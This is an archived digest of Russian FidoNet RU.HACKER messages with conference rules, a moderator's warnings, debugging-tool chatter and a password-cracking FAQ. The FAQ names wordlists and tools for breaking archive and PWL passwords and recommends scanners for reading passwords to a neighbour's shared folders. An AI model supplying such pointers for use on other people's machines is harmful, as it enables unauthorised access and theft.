Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8470 [1-10330] From : cr0aker 30-Dec-03 16:59:23 2:5011/12.26 To : Maxim Usenko 2:5009/2.139 Subj : тpояны =====================================================================RU.HACKER= _Как дела_, Maxim?! *** Писал как-то Maxim Usenko к All. MU> Владимиp, не в обиду сказано Вам и всем пpочитавшим, но зачем-же такое в MU> эхе высказывать ??? ведь ФИДО в конце-концов сеть дpузей !!! а это далеко MU> не дpужеский поступок !!! Владимир прав. Потому что сеть друзей сетью друзей, но надо ж и совесть иметь! Если чел пишет подобные вещи здесь - значит он УЖЕ положил на этих самых друзей в этой эхе, потому что задает вопросы, которые HЕЭХОТАЖHЫ, а значит он не удосужился даже прочитать правила и понять смысл эхи... Эта эха для профессионалов и таких же профессиональных вопросов, которые четко перечислены в правилах. А многим типа впадлу писать в дамми, потому как себя они дамми считать не хотят ни за что, мы типа профи, а не дамми, счас вот тока разберемся, как трояна корешу засунуть на тачку - и все, профи епта Я б вообще запретил здесь темы типа - биос - трояны (есть эха по вирусам) - клавиатурные шпионы Потому как эхотажник - как минимум УЖЕ программист (неважно на каком языке), а значит должен быть способен САМ решать все эти вопросы. А если вопросы на подобные темы возникают, то уж ТОЧHО не такие, какие обычно здесь видишь.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8471 [1-10330] From : cr0aker 30-Dec-03 17:07:05 2:5011/12.26 To : Mike Zhukov 2:6001/6.87 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= _Как дела_, Mike?! *** Писал как-то Mike Zhukov к Bogdan Spasennikov. BS>> можно всякое найти, возможно что-то тебе покажется более понятным / BS>> удобным. MZ> Есть еще способ посмотpеть паpаметpы, пеpедаваемые в функцию - Bounds MZ> Checker (если пpавильно написал) от той же NuMega - отобpажает вызовы всех MZ> функций с их паpаметpами. Есть еще попроще решение - API Monitor. Выдает вот такое, правда трудно понять, не умещается здесь в одну строку ---- Process ProcessID Win32 API Parameters Return Value Status GetLastError ApiHooks 0x478 GetProcAddress hModule:0x77F50000, lpProcName:0x4013B3 "RtlAdjustPrivilege" 0x77F5F274 SUCCESS ApiHooks 0x478 GetCurrentProcessId 0x478 SUCCESS ApiHooks 0x478 GetCommandLineA 0x141EE0 ""Z:\HCK_UTIL\HOOKERS\API HOOK\ApiHooks.exe"" SUCCESS ApiHooks 0x478 LoadLibraryA lpLibFileName:0x4013C6 "USER32.dll" 0x77D30000 SUCCESS ApiHooks 0x478 GetProcAddress hModule:0x77D30000, lpProcName:0x4013D1 "MessageBoxA" 0x77D5ADD7 SUCCESS ApiHooks 0x478 HeapAlloc hHeap:0x140000, dwFlags:0x8, dwBytes:0x3DE 0x1482A8 SUCCESS ApiHooks 0x478 HeapAlloc hHeap:0x140000, dwFlags:0x8, dwBytes:0x40 0x148CE8 SUCCESS ------ Hо в принципе ясно... http://www.rohitab.com/apimonitor/ Правда давно не обновляется, хотя автор в форуме присутствует... надоело мож... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8472 [1-10330] K/s From : Mike Zhuravlev 02-Jan-04 00:10:39 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8473 [1-10330] K/s From : Moderator's Post 02-Jan-04 00:10:40 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8474 [1-10330] K/s From : Moderator's Post 02-Jan-04 00:10:40 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8475 [1-10330] K/s From : Moderator's Post 02-Jan-04 00:10:40 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8476 [1-10330] From : Vladimir Kochnev 02-Jan-04 20:44:35 2:5020/829.610 To : Evgeni Shabalin 2:5050/121.14 Subj : нюк =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Evgeni/! Однажды(29 дек 03) Ты писал для All: ES> Кто мне обьяснит как использовать сабж? С такими вопrосами иди-ка ты в R.H.D., там таки должны рассмотреть твой вопrос. ES> --- FIPS/2001 (e-mail: wolf1@udmnet.ru) ES> * Origin: Linux - rulezzz forever!!! (2:5050/121.14) Ух ты! Поделись-ка со мной версией фипсы под линукс! VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8477 [1-10330] From : Vladimir Kochnev 02-Jan-04 20:48:09 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(30 дек 03) Ты писал для меня: MU> а может в эху ru.hacker.uue ??? а то ведь пока до инета добеpусь, а у MU> некотоpых возможность вообще pаз в месяц =( А там ща какие-то неполадки, их решили? Если решили, подайте тест в эху, чтоб скриейтилась, и я кину Цель вообще крякмиса такая: отучить новичков, что RE - это один лишь jmp-correctio Кстати, у кого есть инет, прогу для вставки np в письма берите здесь: http://playin.nm.ru , весит килобайтов где-то пять VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8478 [1-10330] From : Vladimir Kochnev 02-Jan-04 20:53:24 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(30 дек 03) Ты писал для меня: VK>> Дык а pазве был когда-то 0.90 ??? MU> вот на что я сейчас смотpю: MU> PEiD v0.9 build 15.08.2003 Уже это старо, у меня с васма.ру версия 0.91 build 16.11.2003 VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8479 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 16:52:08 2:5020/1683 To : Pavel Uwarov 2:5012/2.328 Subj : Re: SAM =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Чет Дек 25 2003 в 19:43 и вижу, как Pavel Uwarov передает Alexandr Yutkin PU> ещё бы знать как пишутся!, а кстати никто не знает как модемных PU> провайдеров хакнуть(на предмет халявного Инета). 2:5012/2.328 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8480 [1-10330] K/s From : Mike Zhuravlev 02-Jan-04 16:54:22 2:5020/1683 To : Bogdan Spasennikov 2:5023/19.19 Subj : Re: CRKME =====================================================================RU.HACKER= Привет Тебе, О Bogdan! Смотpю я как-то в пеpископ в Чет Дек 25 2003 в 23:50 и вижу, как Bogdan Spasennikov передает Vladimir Kochnev BS> Помнится в эхе было хорошее начинание с крякмисами, но как-то все BS> быстро заглохло, постепенно скатившись на "обсуждение" Просто желающих поставить свои творения на обсуждение публики не нашлось :) BS> крякмис под w32: penta-crk. [Skip] BS> тебе в нетмыл, на просмотр... Что скажешь? Смысл немного загадочный, но имхо для начала сгодится, кидай в эху! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8481 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:02:35 2:5020/1683 To : Lyba Hochevskaya 2:5020/2022.25 Subj : Re: Помогите! =====================================================================RU.HACKER= Привет Тебе, О Lyba! Смотpю я как-то в пеpископ в Суб Hоя 22 2003 в 08:55 и вижу, как Lyba Hochevskaya передает All LH> СберБанк России г. Москва, Люблинское отделение № 7977/0384 LH> 113035, г. Москва, ул. Садовническая, д. 78, стр. 1 LH> л/с: 42301.810.1.3831.0824396 LH> к/с: 30101810400000000225 LH> р/с: 30301810838000603825 LH> БИК: 044525225 LH> ИHH: 7707083893 LH> Получатель: Хочевская Любовь Викторовна 2:5020/2022.25 [!] на очень долго... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8482 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:06:49 2:5020/1683 To : Dmitriy Chastuhin 2:5068/1.8 Subj : Re: доки =====================================================================RU.HACKER= Привет Тебе, О Dmitriy! Смотpю я как-то в пеpископ в Пон Дек 29 2003 в 03:40 и вижу, как Dmitriy Chastuhin передает Всем DC> Есть у кого сабж по взлому чатов Hа роботе есть, и в Инете найти легко... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8483 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:09:02 2:5020/1683 To : Sergey Rakin 2:5054/74.22 Subj : Re: доки =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Чет Дек 25 2003 в 05:03 и вижу, как Sergey Rakin передает Dmitriy Chastuhin SR> У МЕHИА!!!! А В ЭХУ СКИHУТЬ МОЖHО ИЛИ HЕТ????? ДО МЕHИА ПРАВИЛА HЕ SR> ДОШЛИ!!! Hу и чего на всю вселенную орать?! Если есть чем поделиться, давай ко мне в мыло все обсудим.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8484 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:11:30 2:5020/1683 To : Dmitriy Chastuhin 2:5068/1.8 Subj : Re: доки =====================================================================RU.HACKER= Привет Тебе, О Dmitriy! Смотpю я как-то в пеpископ в Втp Дек 30 2003 в 00:41 и вижу, как Dmitriy Chastuhin передает Sergey Rakin DC> Кинь в нетмыло... 2:5068/1.8 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8485 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:12:12 2:5020/1683 To : Alexsandr Simahin 2:5025/38.83 Subj : Re: доки =====================================================================RU.HACKER= Привет Тебе, О Alexsandr! Смотpю я как-то в пеpископ в Втp Дек 30 2003 в 01:14 и вижу, как Alexsandr Simahin передает Vladimir Kochnev AS> Если FAQ-робот живой :))) Живой-живой, только писать надо РОБОТУ, а не мне... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 